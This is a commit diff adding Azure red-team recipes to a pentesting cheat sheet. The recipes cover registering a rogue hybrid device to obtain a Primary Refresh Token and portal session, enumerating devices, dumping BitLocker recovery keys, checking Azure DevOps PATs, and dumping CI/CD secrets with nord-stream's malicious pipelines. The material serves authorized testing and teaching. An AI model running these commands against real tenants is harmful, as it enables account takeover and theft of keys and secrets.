Azure Devops + Devices + Bitlocker

docs/cloud/azure/azure-access-and-token.md

@@ -129,6 +129,23 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
 ```
 
 
+### Request a PRT with Hybrid Device
+
+Requirements:    
+* ADDS user credentials
+* hybrid environment (ADDS and Azure AD)
+
+Use the user account to create a computer and request a PRT
+* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
+* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10  -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
+* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
+* Get a PRT with device claim
+    ```ps1
+    roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
+    roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
+    ```
+
+
 ## References
 
 * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)

docs/cloud/azure/azure-devices-users-services.md

@@ -23,6 +23,16 @@
 
 ## Devices
 
+### List Devices
+
+```ps1
+Connect-AzureAD
+Get-AzureADDevice
+$user = Get-AzureADUser -SearchString "username"
+Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
+```
+
+
 ### Join Devices
 
 * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
@@ -45,15 +55,30 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
 ```
 
 
-# Service Principals
+### Bitlocker Keys
+
+```ps1
+Install-Module Microsoft.Graph -Scope CurrentUser
+Import-Module Microsoft.Graph.Identity.SignIns
+Connect-MgGraph -Scopes BitLockerKey.Read.All
+Get-MgInformationProtectionBitlockerRecoveryKey -All
+Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
+```
 
 
+# Service Principals
+
 
-# Other
+## Other
 
 Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
 
 ```ps1
 roadtx getscope -s https://graph.microsoft.com/mail.read
 roadtx findscope -s https://graph.microsoft.com/mail.read
 ```
+
+
+## References
+
+* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)

docs/cloud/azure/azure-services.md

@@ -22,6 +22,25 @@ Runbook must be SAVED and PUBLISHED before running it.
     ```
 
 
+## Azure Devops
+
+* Verify the validity of an Azure Personal Access Token (PAT)
+    ```ps1
+    PAT=""
+    organization=""
+    curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds
+    ```
+
+* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.
+    ```ps1
+    # List all secrets from all projects
+    $ nord-stream.py devops --token "$PAT" --org myorg --list-secrets
+
+    # Dump all secrets from all projects
+    $ nord-stream.py devops --token "$PAT" --org myorg
+    ```
+
+
 ## Microsoft Intune
 
 * LAPS
@@ -72,4 +91,5 @@ Get-MgDrive -top 1
 ## References
 
 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
-* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
+* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
+* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps)